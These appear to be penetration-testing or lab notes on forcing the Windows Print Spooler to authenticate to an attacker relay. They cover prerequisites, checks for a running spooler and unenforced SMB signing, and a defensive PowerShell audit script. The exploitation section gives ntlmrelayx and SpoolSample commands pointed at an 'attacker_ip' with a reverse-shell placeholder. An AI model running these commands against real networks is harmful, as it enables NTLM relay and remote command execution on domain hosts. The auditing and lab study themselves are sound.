An authenticated domain user can force the Print Spooler service on a host to authenticate to an arbitrary IP address. Some related exploits may allow unauthenticated access; see Spooler, PetitPotam, PrintNightmare.

Requirements

  • A valid set of AD user credentials.
  • Network connectivity to the target’s SMB service.
  • The target host must be running the Print Spooler service.
  • The host must not enforce SMB signing (otherwise the relayed authentication is rejected).

Check if target is vulnerable

Check whether the Print Spooler service is running on the target host (Get-WmiObject alias; the call only succeeds if the spooler answers):

GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc

Alternative PowerShell cmdlet (PrintManagement module):

Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc

If the check errors

Sometimes the remote WMI/RPC ports used by these checks are blocked by the host firewall, so an error does not prove the spooler is stopped. If that happens, just try the exploit.

SMB Signing not enforced

nmap --script=smb2-security-mode -p445 <source> <dest>

Check whether either the source (if operating from a remote pivot host) or the destination requires SMB signing; if signing is required ("Message signing enabled and required"), the relay will fail.
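The two preconditions above (spooler running, SMB signing not required) are also what a defender should audit fleet-wide. The script below is an added example, not part of the original notes or of any tool they reference; it assumes WinRM/CIM access with an administrative account, and the host names in the list are placeholders. It reports, per host, whether the relay path is open and leaves remediation as commented commands rather than changing anything.

```powershell
# Added example (not from the original notes): audit hosts for the two
# conditions the notes check manually. Assumes WinRM/CIM reachable with
# admin rights; host names are placeholders.
param(
    [string[]]$ComputerName = @('thmserver2.za.tryhackme.loc')  # placeholder list
)

function Get-SpoolerRelayExposure {
    param([Parameter(Mandatory)][string[]]$ComputerName)

    foreach ($h in $ComputerName) {
        $result = [ordered]@{
            Host               = $h
            SpoolerState       = 'unknown'
            SpoolerStartMode   = 'unknown'
            SmbSigningRequired = 'unknown'
            Exposed            = $false
            Error              = $null
        }
        try {
            # Service state via CIM (same WMI class family as the GWMI check)
            $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'" `
                                   -ComputerName $h -ErrorAction Stop
            $result.SpoolerState     = $svc.State
            $result.SpoolerStartMode = $svc.StartMode

            # Server-side SMB signing requirement, read on the host itself
            $result.SmbSigningRequired = Invoke-Command -ComputerName $h -ErrorAction Stop -ScriptBlock {
                (Get-SmbServerConfiguration).RequireSecuritySignature
            }

            # Both conditions from the notes must hold for the relay path to work
            $result.Exposed = ($svc.State -eq 'Running') -and ($result.SmbSigningRequired -eq $false)
        }
        catch {
            # Blocked RPC/WinRM ports make the check inconclusive, not safe
            $result.Error = $_.Exception.Message
        }
        [pscustomobject]$result
    }
}

Get-SpoolerRelayExposure -ComputerName $ComputerName | Format-Table -AutoSize

# Remediation on an exposed host that does not need to print (run there, as admin):
#   Stop-Service Spooler; Set-Service Spooler -StartupType Disabled
#   Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
```

Hosts that return an error are listed with Exposed=False but a non-empty Error column; treat those as unknown rather than safe, for the same reason the notes above say a failed check is not conclusive.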

Exploitation

The example below targets auth.server.domain.name by forcing a compromised host's print spooler to authenticate to the attacker's relay, which forwards that authentication to auth.server.domain.name.

Set up the authentication relay on the attacker machine (may be unstable) and specify the command to execute on auth.server.domain.name:

/usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb://"auth.server.domain.name" -c 'revsh command' -debug

This relays the authentication request coming from the print spooler service to the domain-joined target machine.

Start the attack on the compromised host (authenticate against auth.server.domain.name through attacker_ip):

SpoolSample.exe "auth.server.domain.name" "attacker_ip"

Wait for the relay to receive the authentication attempt and execute the command.